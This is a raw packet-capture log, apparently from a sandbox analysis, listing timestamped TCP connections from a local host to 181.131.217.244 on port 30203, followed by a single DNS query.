                                                                                                                      Dec 12, 2024 17:33:36.951097012 CET5008630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:36.952202082 CET5008630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:37.073139906 CET3020350086181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:37.073211908 CET5008630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:37.194075108 CET3020350086181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:38.412519932 CET3020350086181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:38.412632942 CET5008630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:38.412892103 CET5008630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:38.517465115 CET5008730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:38.532593966 CET3020350086181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:38.639173985 CET3020350087181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:38.639256954 CET5008730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:38.640301943 CET5008730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:38.765542984 CET3020350087181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:38.765705109 CET5008730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:38.885605097 CET3020350087181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:40.067796946 CET3020350087181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:40.068725109 CET5008730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:40.068725109 CET5008730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:40.180650949 CET5008830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:40.192369938 CET3020350087181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:40.301080942 CET3020350088181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:40.301254034 CET5008830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:40.325304031 CET5008830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:40.445514917 CET3020350088181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:40.445652962 CET5008830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:40.565694094 CET3020350088181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:41.666902065 CET3020350088181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:41.670618057 CET5008830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:41.670803070 CET5008830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:41.784498930 CET5008930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:41.790914059 CET3020350088181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:41.905682087 CET3020350089181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:41.908654928 CET5008930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:41.912496090 CET5008930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:42.032542944 CET3020350089181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:42.036595106 CET5008930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:42.156640053 CET3020350089181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:43.370789051 CET3020350089181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:43.371494055 CET5008930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:43.371495008 CET5008930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:43.487339973 CET5009030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:43.497392893 CET3020350089181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:43.608068943 CET3020350090181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:43.610759020 CET5009030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:43.612042904 CET5009030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:43.732019901 CET3020350090181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:43.732223034 CET5009030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:43.852379084 CET3020350090181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:44.952260017 CET3020350090181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:44.952337980 CET5009030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:44.952585936 CET5009030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:45.063920975 CET5009130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:45.072947979 CET3020350090181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:45.183829069 CET3020350091181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:45.183965921 CET5009130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:45.184693098 CET5009130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:45.304408073 CET3020350091181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:45.304548979 CET5009130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:45.424416065 CET3020350091181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:46.810220957 CET3020350091181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:46.810305119 CET5009130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:46.810463905 CET5009130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:46.923403978 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:46.931078911 CET3020350091181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:47.043246984 CET3020350092181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:47.043344021 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:47.044318914 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:47.164748907 CET3020350092181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:47.164858103 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:47.285645008 CET3020350092181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.380022049 CET3020350092181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.380079031 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.380276918 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.486213923 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.500149965 CET3020350092181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.606108904 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.606190920 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.607487917 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.727349043 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.727411032 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.847429991 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:49.079730034 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:49.199768066 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:49.200026989 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:49.320631027 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.104000092 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.104183912 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.104314089 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.220627069 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.225279093 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.341669083 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.341794014 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.342770100 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.462866068 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.463062048 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.582950115 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.771426916 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.771740913 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.771858931 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.876389980 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.891709089 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.996685982 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.997050047 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.997719049 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:52.117862940 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:52.117993116 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:52.237898111 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.389195919 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.389425993 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.389601946 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.501523972 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.511085987 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.622243881 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.622375965 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.623344898 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.743725061 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.743849993 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.865520000 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.865669012 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.985460043 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.284508944 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.284576893 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.284801006 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.392071009 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.404582024 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.512144089 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.514413118 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.515309095 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.635138988 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.635220051 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.755068064 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:56.830874920 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:56.831001997 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:56.831115961 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:56.939431906 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:56.951503992 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.059604883 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.059775114 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.060704947 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.180422068 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.180639029 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.300494909 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.689409018 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.809446096 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.809530020 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.929291010 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.453821898 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.453895092 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.454116106 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.564126968 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.573754072 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.683967113 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.684063911 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.685112953 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.805427074 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.805475950 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.925786972 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.047749043 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.048321009 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.048588037 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.159202099 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.169020891 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.279472113 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.279627085 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.283340931 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.403609037 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.403785944 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.525660038 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:01.746926069 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:01.753767967 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:01.753767967 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:01.875463009 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:01.891680956 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.012415886 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:02.012535095 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.013243914 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.135426998 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:02.135515928 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.255270958 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.460623980 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.465115070 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.465116024 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.583332062 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.584830046 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.703114033 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.704171896 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.704251051 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.824204922 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.826872110 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.947052956 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.090313911 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.090378046 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.090609074 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.205020905 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.210458994 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.325190067 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.325273991 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.326471090 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.446674109 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.449979067 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.569827080 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.691329956 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.691407919 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.691591024 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.798733950 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.811333895 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.918576956 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.918657064 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.919905901 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.039901972 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:07.040307999 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.160191059 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:07.361063957 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.481874943 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:07.482012987 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.602551937 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:08.498171091 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:08.498231888 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:08.498562098 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:08.610915899 CET5010530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:08.618311882 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:08.730793953 CET3020350105181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:08.730875015 CET5010530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:08.731970072 CET5010530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:08.851752043 CET3020350105181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:08.851805925 CET5010530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:08.971906900 CET3020350105181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:10.113238096 CET3020350105181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:10.113362074 CET5010530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:10.113477945 CET5010530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:10.220238924 CET5010630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:10.235090971 CET3020350105181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:10.340783119 CET3020350106181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:10.341353893 CET5010630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:10.341577053 CET5010630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:10.462948084 CET3020350106181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:10.463009119 CET5010630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:10.582818985 CET3020350106181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:11.848527908 CET3020350106181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:11.852648973 CET5010630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:11.852962971 CET5010630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:11.970438004 CET5010730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:11.972631931 CET3020350106181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:12.090714931 CET3020350107181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:12.094676018 CET5010730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:12.098582983 CET5010730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:12.218945980 CET3020350107181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:12.222668886 CET5010730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:12.342457056 CET3020350107181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:13.592808962 CET3020350107181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:13.596667051 CET5010730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:13.596784115 CET5010730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:13.704543114 CET5010830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:13.717232943 CET3020350107181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:13.824697018 CET3020350108181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:13.828677893 CET5010830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:13.832531929 CET5010830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:13.954277039 CET3020350108181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:13.956582069 CET5010830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:14.076565027 CET3020350108181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:15.142622948 CET3020350108181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:15.142693043 CET5010830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:15.142867088 CET5010830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:15.251612902 CET5010930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:15.262867928 CET3020350108181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:15.371484995 CET3020350109181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:15.371613026 CET5010930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:15.372292042 CET5010930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:15.493072987 CET3020350109181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:15.500576019 CET5010930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:15.620671988 CET3020350109181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:15.621002913 CET5010930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:15.742539883 CET3020350109181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:16.785398960 CET3020350109181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:16.785476923 CET5010930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:16.803186893 CET5010930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:16.907819986 CET5011030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:16.922935009 CET3020350109181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:17.027928114 CET3020350110181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:17.028033018 CET5011030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:17.028662920 CET5011030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:17.148648977 CET3020350110181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:17.148807049 CET5011030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:17.284473896 CET3020350110181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:18.605649948 CET3020350110181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:18.605720043 CET5011030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:18.605918884 CET5011030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:18.720880985 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:18.726524115 CET3020350110181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:18.840771914 CET3020350111181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:18.840871096 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:18.841893911 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:18.961653948 CET3020350111181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:18.961734056 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:19.081643105 CET3020350111181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:19.722587109 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:19.842426062 CET3020350111181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:19.842494965 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:19.962363958 CET3020350111181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:20.314034939 CET3020350111181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:20.314946890 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:20.315066099 CET5011130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:20.434994936 CET3020350111181.131.217.244192.168.2.10
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 12, 2024 17:30:35.365287066 CET5970153192.168.2.101.1.1.1
